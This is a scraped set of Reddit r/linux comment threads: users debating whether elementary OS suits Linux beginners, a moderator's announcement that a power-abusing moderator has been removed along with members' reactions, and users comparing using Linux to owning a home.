I think, recommending Linux has to be done with a very important warning that Linux is not Windows and it's not meant to "replace" Windows. Yes, there are applications that run on Windows and Linux as well, but many applications have alternatives that may pose a learning curve, especially to die-hard Windows jerk-offers that'll instantly install WINE and run 7-Zip through that (looking at Linus Sebastian here).
No fractional scaling kills any DE for me and people pretend like it’s not a big deal.
For someone that comes from Windows I think the safest bet would be to suggest them Ubuntu. It's the best compromise. If they complain about the different feel of the UI and they really don't wanna learn there is kubuntu. If they still miss windows just trick them with zorinOS.

Elementary is great but still a bit too naive in my opinion. It will surely grow up and become flawless.

Elementary OS is presented as a Windows and Mac OS alternative, and I think it will be a solid one, one day. I don't think anyone from Devs wanted to say that it is actually the easiest jump into linux, I think they wanna say that elementary will be one of the mainstream OSs one day.
I see elementary as something to recommend to Mac converts not windows.  But honestly that's mostly cosmetic reasons.
Just throwing this out there, ZorinOS, it’s Ubuntu based, would look very familiar to windows users, imo easier to use than Pop, and very much so underrated
In my opinion EOS is 100% not a beginner distro,  and has too many drawbacks for most users. Its a cool project, but I don't think it deserves the hype train it normally gets from alot of folks. I did personally installed it to check it out, as I love tinkering on things. After 2 hours of tinkering I still wasn't setup and i was frustrated. I'm by far not a newcomer to linux (i've used many distros since 2015, my first being Ubuntu and now I am on Fedora, with alot of arch and different derivatives in between) and if you know how to fix EOS's problems its fine, but that's not beginner friendly. 

Why is there no upgrade path? Why is each EOS release a clean install? No other distro that i know of handles it this way its just weird. Most users won't want to wipe and reinstall every time a new version comes out. That being said at least the installer is very simple and easy to use. Probably one of the best out there.

I do like how they are relying on flatpacks, as out of the universal but out of the box restricting the installation of .deb files and not having flathub enabled leads to the inability for the beginner to install any apps. I could see them providing instructions to "enable 3rd party repositories" like how Fedora has it, which could enable flathub. 

Otherwise the look and feel is fine and works. I did daily drive a Mac a few years ago when my windows laptop died so I could get used to the interface pretty easily. I did feel EOS 6 was a step back for some of the built in apps, but that should improve as they continue to re-write their email client (since they switched from geary to their own app) and the same with the calender app. I do think there are alot of positives to the distro, but I classify it more in the realm of those hard-core distro users. Only those who are passionate about the project will likely use it.
i have to disagree , Elementary is fine for everyone , i installed it for a relative who had no idea what linux is , he had a terrible experience with windows due to lagging and updates ,   
he likes elementary very much , he didn't like either manjaro or mint

it's been almost a year since i installed it for him and he never had any issues , everything is working perfectly
I think zorin os is a way better choice for any beginner
>No minimize button, which is basically like oxygen to Windows users.

I'll shit on any distro that doesn't have minimize buttons. I hate it when they remove it. 

>No tray icons. Can you imagine a Windows user having Discord without a tray icon? Yeah, me neither.

Uh you got me here. I use Discord and never used the tray icon for anything.
Preach. Then recommend Lubuntu or Ubuntu LXQT. ❤️

And I'm alrwady hurting fee-fees with this comment. ❤️😂
[deleted]
Bad post.

1. No one says it looks like Windows and it's painfully obvious by doing even the most basic research that it does not look like Windows
2. Go to [flathub.org](https://flathub.org), download a file, sideload, reboot system. It sucks, I agree. But I set up the flathub repo before handing it to my family members. It's not a "workaround hack" lol.
3. I tell my family all their software is in the AppCenter. If they need something else they can download the deb and use 'sudo apt install' and drag the deb to the terminal, press enter. Tada! Many linux distros have this exact same issue.
4. Not a legit problem.
5. Not a legit problem. Again focusing on windows users when no one claimed it was a Windows replacement.
6. Probably one of your few legit complaints in here. But it's notable that GNOME, one of the most popular DEs, doesn't have tray icons either.
7. Not a legit problem.
8. Lack of fractional scaling is a linux-wide issue.
9. This is legit. Desktops should ship with popular codecs or make them easily install-able. This issue isn't unique to EOS at all, but it is not solved here either.
10. Not a legit problem.

Again, longtime Windows users are not the target audience for EOS. I don't see people ever recommending it to them. But also, I have trained my family members, who are longtime Windows users, on how to use EOS and they love it.

Again, no one recommends EOS to your gamer nephew. 

Elementary OS is a lot better than many distros beyond these little things. It handles common desktop situations with grace that other distros simply do not pay attention to. For each "hack" you have to do to get it to fit your traditional desktop experience, there is a novel problem that the EOS team has solved with Pantheon that other distros completely ignore.

It's a pleasant desktop perfect for many entry level users who don't demand a lot from their OS. That's all it should have ever been recommended as. Maybe one day they'll solve all of your gamer bro necessities, but that's clearly not the focus of EOS.
I'm not saying you don't bring up valid points, but considering that Manjaro is one of the most frequently brought up noob recommendations these days, I don't think Elementary is that bad of a choice.
[deleted]
Better yet, why don't we just stop recommending Elementary OS? It's really a case of style over substance.
Zorin is just the best option for windows people
It's already ElementaryOS 6, hell even with a big round of updates for 6, and it still has crazy, immature issues and decisions behind most others do not (not anymore or never had). It is for no one. Not one person who would be new to Linux, only for the masochists.
>	 1. The desktop looks nothing like Windows! It never will, please stop pretending they'll adjust!

Elementary is modelled after macOS, not Windows. It’s core audience is macOS users.
Who the hell uses or recommend ElementaryOS? It's 2012 or...?
For godsakes - it's elementary (with a lowercase 'e') please correct.
We should be recommending Pop OS.
I second this
I totally agree
How about we stop going to Reddit for any information at all? The majority of Reddit users don't really know what they're talking about. It's the most basic and least informative source of information on the internet. I dare say Reddit is the most likely legit source of information to mislead or misinform. 

Comparing Elementary OS to Ubuntu seems a bit silly as Elementary is Ubuntu. Pretty much all the exact same terminal commands work, so any Ubuntu solution is usually an elementary solution, too. That said, I've had way less work fixing broken stuff in Elementary than I did using regular plain Ubuntu, and fixing stuff in Ubuntu is easier than fixing stuff in less mainstream distros for a majority of basic users. For that same majority of users, I'd say ease of update and sturdiness are the two most important aspects of any OS. For the record, my girlfriend who is barely computer literate switched from windows to elementary without any problem. How difficult is it to launch a web browser? Also, both her kids have no trouble with it. The people who I think will have problems with it also have problems with windows and their phone, so it's not really the platform but the user. 
 
I've been running elementary for quite a long time now - 5 years or so. Before that I used Lubuntu/Xubuntu, and before that I used plain Ubuntu. I've also tried Kubuntu, deepin, and budgie. I'm not a power user, but capable enough to do what I want. What keeps me using elementary is how simple, beautiful, and efficient it is. Frankly, I find mint to be hideous, and many other distros can be too heavy for old/crappy computers to run. I've never owned a Mac.
I totally agree. Linux mint or Zorin OS are the best for newcomers by far or even advanced users who want a painless and fast setup.

Rock solid and very well maintained projects
Can we also stop recommending that train wreck KDE? People coming from windows to Linux aren't used to that level of customizations. Just recommended a distro with XFCE. It's simple, light weight and very close to Windows without all the extra stuff that new Linux users won't mess with anyway.
The rule of thumb is: 

deepin/mint etc. for windows users and any gnome-centric distro or eos for mac users. 

This is more about which DE tries to emulate which OS.
You're right. Arch is the only _real_ beginner-os! Expect it's not windows and expect nothing will work as you think it will. Problem solved.
[deleted]
Maybe they should rebrand it UniversityOS
Mint is surely the easiest for a new user. It comes with sane defaults, looks like Windows, and handles auto-updates better than MacOS or Windows. Casual user doesn’t want to know that 3 packages have been updated, 2 are outdated, one removed, please restart to update, your printer driver needs attention before it will let you use a previously installed printer today etc; they just want a computer that works when they need it.
2) you sure this still holds true? Im currently tring eOS in a VM and it seems that the store simply installs flatpaks.

8) Does this mean the display's global scale can be any number between 100%-200%, and not just fixed sizes like 100,125,150,175,200 ? coz that may very well be by choice. eOS seems to limit you on arbitrary things with no particular reason.

I agree that this distro should not be recommened to newbies. beyond having some stability issues (to some users from what i have read) and missing some packages, it just doesnt offer anything that makes it good for newbies. In general i really wonder what are the reasons to use it except if you really like the pantheon DE for some reason.
Yes, I generally recommend openSUSE with KDE and so far everyone I recommended it to was happy with it
I mean just suggest mint, it's basically just Ubuntu, but even easier to use and cinnamon looks Hella like windows.
I never recommend Elementary OS to new Linux users.  I've always thought it sucked and lacked common sense features.  My go-to recommendation for new Linux users is Linux Mint if they want something familiar and rock solid stable or Manjaro KDE if they want a rolling release and the latest versions of packages.  I don't recommend distros with Gnome because I find it has its own irritating quirks that will annoy veteran Windows users.
I agree with absolutely everything you said.
IMO the only ones that should be recommended for true beginners are Ubuntu, Mint, and Manjaro.
>So you see, no longtime Windows user will ever like ElementaryOS. They   
might if they discover it themselves but a Windows veteran trying   
'Linux' for the first time? Not a chance.

I agree. Your description of Elementary sounds as if its much more fit for someone coming from a Mac, but the users of that system are mostly extremely loyal to Apple. For me, the "Apple-like" Linux distributions/desktops always look like as if the user of such a desktop would rather have an Apple computer but can't / is unwilling to afford it. (I could imagine someone wanting to have the Mac workflow in open-source software though.)

Personally I like the Windows workflow; but that  might be because I've been using Windows for 25 years on the desktop (NT4, 2000, XP, Vista, 7, skipped 8, 10) before I switched to Debian. Windows 10 and certainly 11 were just becoming too annoying to use; and because all applications except 2, and games, were OSS already, I switched.

I switched to KDE with a few tweaks. I moved the taskbar to the top (where I've had it for 25 years in Windows, which, as of the time of writing, is not possible in 11 anymore), and changed some of the default shortcuts to match those in Windows.

Now I can basically use KDE as if it is Windows, without even thinking about it. The only difference is that I hvae the desktop pager directly left of the tray area; I don't like the Windows 10 way of first having to click into a desktop overview. (Incidentally, this setup looks a lot like the default XFCE setup without the bottom panel; which I also used a lot in the past, if I needed something for weaker systems.)

If a distribution is going to target former Windows-users KDE would be a pretty good choice. With some tinkering, KDE's workflow can be almost indistinguishable from that of Windows.
[deleted]
You can install DEB files with one of the apps from the store. Elementary was my first distro from Linux. I since switched to Ubuntu on my laptop. But regardless, a lot of these complaints are pretty superficial. I didn't know what a snap was or what flatpaks were and so I didn't care they weren't there. The OS was super user friendly imo. No difficulties understanding the UI. I think the question of how to introduce Linux to a noob consumer like myself remains a coveted topic and elementary is taking a unique approach that happens to alienate powerusers.
>No Fractional Scaling and it's almost 2022

To be fair, Windows scaling is a mess too. Want your text to look like it's been through ten iterations of JPEG? Windows fractional scaling has your back!

Not that I'm defending ElementaryOS. I just wish Microsoft would fix this in Windows 10. Maybe they did in Windows 11, but I wouldn't know because the "free" update requires buying a new computer (complete with license) for most folk.
Wow, I'm myself planning to switch to Linux (have been using it for a few years for selfhosting and WSL too already), and after seeing elementary recommended so much I was considering trying it, but this really sounds like a distro that lacks basic things and at the same time is filled with limitations
Elementary OS was my first Distro…. Tried it for about 10 minutes and realized that wasn’t it. Tried a bunch more after that. So I agree, stop recommending it to people. It sucks lol
Elementary is good actually
[deleted]
If you ever need to recommend something point them at Zorin Os
I didn’t know their App Store was that restrictive. They truly are trying to emulate Apple.
[deleted]
But you have no evidence of this. Your anecdotal rants mean nothing. This place used to mean something but now it’s filled with elitist turd bags who can’t control their anger.
I tried ElementaryOS, it looked really good and I'm an experienced Linux user. My goal was to use this install for Golang development and some light gaming with Wine. I ran into a lot of annoying issues such as graphics drivers not working or having to do weird work arounds. I like the idea of ElementaryOS and it's probably good if you have a basic setup and want to browse the web and maybe do school work.

I ended up just installing regular old Ubuntu which has worked really well for me. It's what I would recommend to a first time linux user as well.
I never recommended any version, though I sent links that compared versions and let them choose what's right for them. That choice is more important than the version for users. 

Linux is not a replacement for Windows for most people, unfortunately. It still is only for technical people who can troubleshoot, and work through the issues. Hell, I gave up using it because after working all day on servers, last thing I want to do at home is fix or modify something. I just want to game and relax.
Let me start out by saying I've neglected my duties here on this subreddit. I could use COVID as an excuse for all of the stress that it brought with it. From moving to a "working from home" situation to the multitude of mandates and recommendations that seemed to change on a daily basis, but in reality, I think it started long before that.

That said, I've come back to help with the state of this subreddit. Through my neglect, another mod was able to turn this into their twisted vision of the FOSS philosophy and run unchecked.

For those who don't know, the list of moderators isn't in an arbitrary order. The higher you are on the list, the more seniority you have (been here longer). With that comes the ability to manage other moderators, but you can only manage those below you.

Since this mod was the 3rd on the list, none of the other mods could effectively do anything about this abuse of power. These powers were limited to /u/kylev and myself. Kylev holds an "honorary" mod spot in a few popular/default subreddits as they're close with the Reddit admins in real life and is only here to ensure the whole subreddit doesn't go completely to shit.

Now, that mod has been removed.

/u/purpleidea has been reinstated as a mod. Unfortunately I am not able to arrange the list of moderators, so they're at the bottom of the list, but they're back on the team.

At this time, we are not looking for more moderators, but that may change in the near future.

I am going back through months (and possibly years) of bans to ensure that they were warranted. I'm seeing many bans listed as "Rude user", "Poor attitude", etc. And these are permanent bans. I'm not going to say I wouldn't have acted similar, but a rude user or poor attitude means, at worst, a 2 or 3-day "absence" from the conversation. Let the situation cool down, everyone works on de-escalating, etc.

A deep pit has been dug. We're going to get out of this, though. No massive changes are coming. A few tweaks to automod here and there, sure, but nothing of concern.

As was brought up in the recent META conversation, there is a copy of the automod rules on GitHub. I'm going to look into a way to synchronize changes made to automod to a GitHub repo so that they are public. I'm still unsure about making the modlog public, but this is something I will be discussing with the other mods.

Thank you all for sticking with us, and I sincerely apologize for letting it get so bad.

kruug, and the rest of the mod team. (I couldn't do it without every one)

&#x200B;

EDIT: Forgot something. As many of you know, the GitHub/Proprietary software automod rule is gone. I found it just as annoying and asinine as everyone else.
Well this is amazing to see. It's so damn rare for Subreddit Moderators to actually take large scale action against something like this.  
Great work.
Here's some history from the removed mod: https://www.reddit.com/r/linux/comments/8jglse/rlinux_rules_get_an_update_clarifications_better/dz0a9m8/ (click his downvoted comments to see the rest of the discussion)
> Unfortunately I am not able to arrange the list of moderators, so they're at the bottom of the list, but they're back on the team.

Well you *can*, but you need to remove and replace the entire list up to that point.  Probably not worth it, though YMMV.
[deleted]
Finally, the worst moderator in the history of this subreddit is out.

Time to pop open those champagne bottles!
CAP_NAME_NOW_UPVOTE is a douchebag mod and should have never been mod here nor allowed to have any sort of power. Any actions by them should be carefully reviewed and people unbanned who were banned by him. 

He mods a small firearm sub called /r/taurus and instead of actively moderating it, overnight, he turned it into a sub about constellations and stars instead of firearms. When asked to turn it over to users who are active in that community, he dug in deeper and refused to give it to anyone who was into firearms. on top of that, he DELETED all of the history of the sub. Year and years of posts. hundreds of posts and tens of thousand of comments of educational and historical content, all gone and wiped out.

Guy is pretty much the stereotypical socially awkward loser.
It might be worthwhile to open a ban appeal form for the people CAP banned. I'd also second allowing YouTube links on the sub. And, last but not least, thank you!
> /u/purpleidea has been reinstated as a mod. Unfortunately I am not able to arrange the list of moderators, so they're at the bottom of the list, but they're back on the team.

At least until the reddit admins move to Australia or there's a https://en.wikipedia.org/wiki/Geomagnetic_reversal or something and I get to be on top!

Please remember to be excellent to people, even when they're not being their best, and let's have an excellent subreddit of content!
> Now, that mod has been removed.

Thank you for putting an end to the nonsense. I sent a complaint about that mod power tripping to the modmail over 2 years ago and he'd only gotten worse since. 

It's so nice to have a steady hand back at the wheel.
>As many of you know, the GitHub/Proprietary software automod rule is gone.

Thank you *so* much.
Thanks for stepping in before it progressed. I'm sure we've all seen the various subs that blow up entirely, and which result in the sub dying and a new one taking its place. So thank you for preventing it from getting that far.

I don't think you need to be totally responsible for the fiasco, nor have a responsibility to completely manage the sub. In fact I would say the higher you are on the mod list, the less you need to be involved. I would think the primary responsibility of the higher-ups is to moderate the moderators, while the lower mods moderate the sub.  
So maybe some fault does lie with letting this one mod go a bit off the rails, you stopped it before it went too far, and that's the important bit.

Thanks!
Nobody said anything positive about CAP_NAME_NOW_UPVOTE. That says everyting about the former moderator.
Thank you, and thank you for the transparency!
Is removed content under review too?

CAP removed my post that pieced together a timeline of CentOS Board votes and the so-called "voice of the community".  

I had given up on this sub but am glad mods are taking a look.
A website moderator abusing power has got to be the saddest thing a person can do on the internet.
Thank you so much! I felt that CAP was way too harsh for way to long.  Sometimes it bordered on "petty tyrant" behavior.
[deleted]
Thank you.
Is the youtube link removal turned off too? Many linux related videos are only available on youtube and they're removed before they reach anyone. For example, Ubuntu Kylin only has a YouTube channel and their videos are not available on Odysee or other platforms so it makes sense to allow youtube links from certain official channels. Please look into it.
> the GitHub/Proprietary software automod rule is gone


The evil is defeated :)


Today is a good day. Thank you!
OH MY FUCKING GOD YESSSSS
> Kylev holds an "honorary" mod spot in a few popular/default subreddits as they're close with the Reddit admins in real life and is only here to ensure the whole subreddit doesn't go completely to shit.

Statements like these always seem so weird to me.
I feel like i can breathe in this subreddit now
Thanks for coming back. I think these are all changes for the better.
thank you, the recent actions of CAP were absolutely ridiculous. welcome back.
Wow, a sane Reddit mod. This is amazing. I DEFINITELY encourage you to pursue making the mod logs (tbh even somewhat censored mod logs) public. It would be a huge step in building trust in this community.
Thanks Kruug, I'm glad you could clear this up.

I remember when you became a mod here following the mess with masta years ago (during an eerily similar situation). Modding is a particularly thankless volunteer job, so don't be too hard on yourself. Your level-headedness has always been a credit to this community, and I appreciate you for that.
***Everyone liked that***
Glad to hear this.

However, and I don't see this as a huge issue, but does no one else think it feels a bit off to have an honorary mod above all active mods simply because they know the admins in real life? Shouldn't the rank of a mod be based on merit, rather than who they know?
Are you unbanning GamingOnLinux ?
hey thanks for the work you and the mod team do, /u/Kruug - I know how difficult and mentally taxing moderating large communities can be; so the fact y'all have done such a standup job thus far is worthy of commendation.

If anything, the response from the mods on this issue has been nothing if not exemplary, and I'm glad to see things are on the right track. Much kudos.
[deleted]
Hey, thanks for this. It's the ideal response. I would suggest not keeping the mod queue public though, I think that users should feel comfortable making reports without judgment.

I've been a mod before and... it's boring as shit. I get why you sort of let things get this way, it's thankless and \*so boring\*. 99% of it is "someone is spamming, click some buttons to ban them". 1% of it is "ah christ, everyone is complaining about something and blaming me, time to try to figure out wtf is going on as quickly as possible and then try to make everyone happy". And basically for nothing.

Anyway, again, excellent work on this.
Man, I always thought he sucked a little but had good intentions but I’ve now read all these horror stories.

Yeesh...

Anyway, good on you mods. I appreciate you guys’ work as I relied heavily on this sub for my Linux transition last year :)
Thank God. Pardon my French but CAP was a power-abusive, arrogant piece of shit and probably one of the worst mods I've ever seen on Reddit.

The sub is immensely better off without them. The fact that there seem to only be one or two FOSS obsessives against this decision and massive support otherwise tells you everything you need to know.
Thank you, sincerely.
Amazing announcement. If only more mods in other subs would take this kind of decisive action we might get good conversations and debates more widespread on reddit again instead of the "I don't like your opinion so you're banned for life" nonsense. 

Look forward to the subs future.
Thank you. This is how you handle this kinda issue.
Hopefully it was this jackass that was demoted. Literally not allowed to form your own opinion unless it aligns with somebody else’s or else it’s “trolling” and against the rules..

https://i.imgur.com/yiaa8TZ.jpg
This is amazing news. Massive respect for stepping up, cleaning up, and owning up.
> Forgot something. As many of you know, the GitHub/Proprietary software automod rule is gone. I found it just as annoying and asinine as everyone else.

You're selling us out? (jk)

I fully support FOSS advocacy, and will generally recommend FOSS over a similarly useful proprietary alternative, but that one dude had a tendency to just interject into any conversation about it about why the user should be using FOSS, rather than discussing the topic.  I have a few propreitary apps I use as well (Renoise, Steam, etc).  I never interacted with the mod, but having that as a mod sort of put me on edge.  The automod thing was kinda weird, too, since a lot of use cases for Linux actually involve proprietary systems, and having those responses sort of messes up the conversations.
Thank you!
Welcome back!
>EDIT: Forgot something. As many of you know, the GitHub/Proprietary software automod rule is gone. I found it just as annoying and asinine as everyone else.

Oh thankyou so much, that thing was such an annoying eyesore.
Glad to read this post. I was very concerned regarding CAPS behavior on this sub.
Can we enforce 'r/linux is not a support forum' rule more? So many questions and asking for help :(
*Peers out of cave into /r/Linux* 

Are we-?

Can we have good links... and fun... Again?

Is the night over?
After all this time, fucking finally! I still remember the days anarchy week.
> into their twisted vision of the FOSS philosophy

Can you elaborate what this means, because I often don't really feel welcome here.

I have been using Linux on the desktop for 15 years and I'm the author of a popular desklet for the Cinnamon DE, but I often don't share the views or beliefs people has in this subreddit, I really think that a lot of people here are kinda fanatic about Linux and open source.
It’s hard to come back after putting something off for whatever reason. It’s nice that you made this post and I hope it won’t cause you more stress in your real life.
Wait, this _isn't_ r/linux_memes?  

Kidding. Good to have you back.
when will humans learn about power
It's good you finally removed the tyrant powermod, but it's going to require having to rip off the band-aid instead of trying to manually restore the subreddit's reputation by slowly peeling it off. That mod singlehandedly made this subreddit a meme on other parts of reddit for how much they were powermodding. They would stalk poster comment histories looking for any reason to ban them. They would DM people on Twitter mocking them for being banned and attempting to appeal. And now they've posted a shock image on their user profile in response to being demodded. An absolutely normal response, I assure you. 

I think you're going to have to blanket reverse all of the CAP bans. I wouldn't be able to trust -any- of those ban reasons that were put in, and a LOT of people were banned - permanently!- for simply pointing out the Github bot reply was annoying, the very thing that was CAPS undoing. Those people were regular, great posters that got permed, and often CAPS would delete the entire thread chain to cover their tracks. Even distro maintainers and open source software founders/maintainers have been banned for simply posting about updates of their own software because CAPS got a wild hair about them. People were even permabanned for asking why a comment thread was deleted.

I believe you can turn the subreddit around, but it's going to require a lot of work and a lot of unwinding what CAPS was trying to do with the subreddit. Additionally, I think people will believe you more if people can't get banned by the mods for the mod simply feeling like it, which a mod has already indicated they will do going forward, which is a letdown. The ban log should be public so the users can audit it, and mods shouldn't be deleting content unless it's truly a spam link or harmful content.

That's my two cents. I do not envy the work ahead of you, but at least you admitted what happened. But I'm definitely not gonna help tell people "the subreddit is back and good now" until a lot of those hollowed out burned bridges are fully restored.
On an unrelated note, can we update the subreddit banner on old reddit to use the new r/place tux graphic with the distro logos and what not?
Can't say I'll miss the appallingly hypocritical AutoMod comments complaining that GitHub is proprietary and promoting the also-proprietary GitLab. Good riddance.
Finally!!
So you're saying the power tripping mod that I and many others pointed out was power tripping, was....nice.

edit: also, thanks.
Hi, thanks for taking up some responsibility for this. Bad moderation really can drag down the site.

Is there any clarification on linking stuff from [lunduke.locals.com](https://lunduke.com)? I had a post removed from this site and would like an honest clarification. Thanks.
Kudos for taking steps to improve the subreddit. Though I have some minor issues with how things have been run around here, I do think this is an important community and I'm happy to see steps taken in a positive direction. :)
So apparently there is a whitelist for YT channels. Fair enough I guess, but is it public? IMO we should post more YT links to feed the algorithm and there are great Linux channels like The Linux Experiment or Niccolo Ve (KDE dev).
Powermods will be the end of this site.
Thanks for stepping up and taking ownership. That’s an amazing character quality if I’ve ever seen one. I’m glad this sub is going to start turning around.

Cheers!
Nice. Now with everything sorted out, I can’t wait for the automod rule to remind people that reddit is proprietary every time they post here!
Oh, thank fucking god.
Take specific steps against FOSS fanaticism and bigotry. Document it and show how that detracts from the appreciation and promotion of FOSS, especially towards new users.
Chad af
[deleted]
You handled it all very well, fair play.
Excellent news! I had so many run-ins with that guy.
[deleted]
Fuckin' finally! I hated seeing an interesting title on this subreddit because I knew it would soon get locked.
>another mod was able to turn this into their twisted vision of the FOSS philosophy and run unchecked.

I'm not *super* active in this subreddit so I never interacted with the moderator in question, but I'm wondering what you're referring to by this.
Why is GamingOnLinux not allowed? Seems really stupid to ban entire sites, especially a quality site. Seems like a mod power trip if anything.
Thank you!
epic
Thank you.
Great to see!
Wow. Good show. 👏🏻
Thank fuck
Thank you <3
This post is based. I am writing it in a long format because of automoderator.
Meanwhile over on r/programming people are losing it over GitHub banning Russian accounts and the subsequent loss of PRs, comments etc. The very thing the auto-mod was warning about - oh the timing of it all!! I hated that auto-mod but this is a bit ironic.

Does anyone feel like creating FossilHub for me? I'm too lazy to do it and don't want to pay for hosting :p
Please remove the requirement for having a registered email to post on this subreddit. Out of all the subreddits I frequent, this is the only one that has that requirement, which is ironic given Linux users are typically more privacy centric than the general public.
> another mod was able to turn this into their twisted vision of the FOSS philosophy

What's "twisted" about the GitHub rule?
Is it me or do a lot of people in here suddenly diss on FLOSS?
Does that mean that it is now allowed to advocate for closed source software including closed source drivers? /u/CAP_NAME_NOW_UPVOTE was the one keeping /r/linux free from useful idiots simping for corporations.
On the eve of Ubuntu release. This is a targeted attack on Ubuntu users.

Why not address this drama earlier or later.
Can we get an official discord server? Most people use Discord these days and it's silly to neglect that fact.
bring back the proprietary warning

it was innocuous to those that acknowledged it and irritating to those that needed to follow it

therefore it literally has no downside
[deleted]
What I feel each morning after turning my computer on is the same feeling of owning a house, not renting one. A house that is given to you for free. A place that you can decorate as you wish, a place without cameras inside spying at you. The furniture is also given to you for free. It is just a matter of time, the time you dedicate to make it beautiful.

This just makes my days happier, because it is joyful living in a nice place.

Thanks to the creators, maintainers, and supporters of this amazing community!

Have great day folks!
I never really put much thought into it, but since I've switched to linux full time a few months ago, it's just always felt *fun* using my computer, no matter what I'm doing. It almost feels like I'm a kid again, but I love it
There’s no place like ~
Well said. It's cozy.
That's poetic, and an apt analogy!
[deleted]
[removed]
My favourite part about it is the fact that if I don't like the way it looks, I can just change it back. Been using my own Ubuntu 10.04 LTS theme for a long time thanks to MATE, even though the real deal ended support a long time ago.
Home is where /home is.
I am very specific about how my desktop environment is configured and I've always appreciated how easy it is to combine different elements to get to your final form. As someone who's not a developer (UNIX systems administrator professionally), I also appreciate that I don't need a certification from Microsoft to learn how to do the simplest things. I've been using Linux for around 22-23 years now and I've watched it come a LONG way. It gets more amazing every year.
It's all fun and games until a pipe bursts and floods the basement and once you get it fixed you notice all the crap you put in storage down there, wondering why it's there, and you spend an entire afternoon trying to figure out what you still need.

I'm only mostly joking. You don't have to do that last part if the living area is fine and you don't mind leaving some cruft where you won't notice.
I never felt this until I started using it full time on my personal machine. Now when I get to work and have to use Windows 10, I really miss Linux. 

Might have to spin up a VM and work primarily in there!
for me my PC is like a person, I say `morning` (currently just echos my todo list into terminal, one day I'll make this something fancy) every day once I sit at my desk and `ninii` (shutdown) before going to bed.
Meanwhile when I turn on my windows desktop that I use solely for playing I feel like entering a overpopulated kindergarten. And then I open the task manager and realize I'm in hell. 

At the center of the room there's one kid called "Antimalware Service Executable", totally covered in shit, screaming at the top of his lungs, consuming 50% of my ram.

 There are other 78 kids running and screaming all around
Linux is like a home that you own. Mac OS is like renting an expensive AirBnB in a posh neighborhood. Windows is like living with your creepy uncle who secretly records you while you sleep in exchange for room and board, and sometimes you come home to find that he's rearranged your furniture, knocked holes in your walls, and spilled coffee over your clothes, and when you ask him why he did this, he says "it's an upgrade."
I think most of us won't know the feeling of owning a house...
~
It's worth noting it isn't *just* Linux that is this way- its FOSS.

I have been using as my main OS for the last 2 years *Qubes OS*; I'm using Xen, Qubes project code, Fedora Linux, and Debian Linux as my main OS (because a combination of all those projects IS Qubes). I also have a desktop which I've relegated to periodic gaming (D2 mainly since Qubes is NOT a gaming OS), and that has an Arch and Debian install. I also use VMs on the Arch install, and most of them are *Bedrock Linux.* 

The point I'm making is that FOSS code empowers other FOSS code. Linux is great, but you need X or wayland too (except for you CLI purists :D), a desktop environment or window manager, and so on. Qubes takes a bold approach to security, and it is empowered by Linux/Xen/their-own-code. Etc and so on..

I do get what you mean though. For me, I feel more like FOSS is *me living in a dying world making my last stand.* Not that FOSS is not capable (on the contrary)- just that the corporate tyrants (and the governments they co-opt) keep getting victory after victory, and we citizens just keep seeing more and more of our power sucked away. In the computing world, FOSS is about the only software left that actually follows any ideology of prioritizing the rights and well-being of the userbase.
For me (I work in IT) getting home and unlocking Linux machines is a gigantic sigh of relief because I just spent my days trying to fix malicious software people refuse to stop using. (Microsoft)
What an odd way to think about an OS.
As a Linux user and a Mac user and a windows user in equal measure: y’all in a _cult_.

\**sips from his TeamOS/2 mug*\*

...a __*cult*__.
This is exactly how I feel after finishing work, and booting up my computer. The more cloud integrations invade windows/macos, the more my OS feels like only a client to something outside of my control. I'm so deeply grateful to linux and the BSDs.
Ownership matters. This is why co-operatives and software freedom can fix many problems in society.
A nice and joyful house that occasionally catches fire but you get real good at putting out the fires (after your first few houses get burnt down, of course) and knowing what to do to prevent one from occurring in the first place. Also you live in a place with terrible service coverage and poor travel links. Though, the neighborhood is super safe.
[deleted]
[deleted]
The more I use Linux (mainly Fedora and Ubuntu) the less comfortable I feel any time I have to use Windows, which I have to use at uni and work.
I really don't like Windows 10, but I have too much expensive software that either won't work on Linux, or is too much hassle to bother with configuring to make the switch full-time.  But every morning I switch to my Linux SSD for work.  This wasn't a big deal until I installed Arch recently(was using Ubuntu).  Now I realize what all the fuss is about.  It's the first time after using Linux for years that I really feel like it's my OS.
This is exactly how I feel. Especially in a world where everybody's trying to squeeze something out of you, I can at least use my Linux system without feeling like I'm supporting some sort of evil or being taken advantage of.

I've tried to give back by publishing a few guides under a different alias for getting some various tasks accomplished. I've been emailed a couple times by people saying thanks, which is the *coolest* thing.
Yes.. I've been using Linux for 5 years now and I actually feel it's easier to use than Windows now. I can't imagine switching to any other OS.
I have to come from a locked down version of windows I use in my DoD job. It's such a relief to fire up my Linux box and not be hindered and know I'm probably more secure to boot. At work I get the stink eye for turning off icons on the desktop and putting my task bar on the left.
As I've gotten older, I've been able to contribute a bit to projects and development organizations. I'm not getting a building or release named after me anytime soon, but it's nice to be able to help keep the lights on and people's coffee cups full for this stuff.
That's an interesting analogy.

Personally, I have used to talk about GNU/Linux in terms of a lego robot. The UNIX piping and redirection supplied by a GNU userland are like lego bricks that when atop the linux kernel is brought into a whole that makes for a robot that can do anything.

It can run on a toaster and on the top 500 super computers alike. It runs the internet, and it runs the sensors in the green house or the micro brewery.
Recently, started a freelance project and the client insisted on giving me one of their windows laptops and even though the machine is a beast I hate that thing. I use a windows pc for gaming, but having to work on that thing is a torture in many ways compared to linux or mac os. So yeah, a good os feels like home and is a pleasure to work on.
Thanks all for your comments! So many awards! Awesome, you rock! and lets continue supporting our community. Best!
Yeah, the freedom to do whatever you want.
I chucked linux on my pc at a whim alongside windows. Never looked back. Got mint as my daily driver, debian to learn something more complex and eventually transition over to, and windows sits there dormant.

Not gonna lie, learning to use linux was a frustrating headache at times, but I got immense satisfaction from figuring it all out.

I hope to God some big corporation like Microsoft doesn't buy it out like they did with github.
Linux is like being at \~

FTFY
We all can say it out loud: "I am home." 😊😎
Yo, if you rent a house and your landlord put camra in it to spy on you, you should sue him
I can relate. I used to be a full-time windows user, but for a few months now I have been using Linux mint for school and I love it. it feels like the os is owned by me. I can customize it however I want, it never crashes, it uses fewer resources, and it shuts down when I tell it to. I can install and uninstall any program, I don't have to worry about antivirus, etc. Is it perfect? no. Is it better than windows? yes.
You don't see a lot of wholesome posts these days.

A bit of positivity in a sea of negative news is a very welcome one.

I do not feel strongly against proprietary software... but I completely understand that sense of complete control when operating Linux; furniture and decorations, and in some cases, I have full control of the foundation too.

While I do still dual boot Linux and Windows, I heavily prefer Linux for any work; using Windows had become more of a "need" because other people that I collaborate with require the use of Windows-only software.

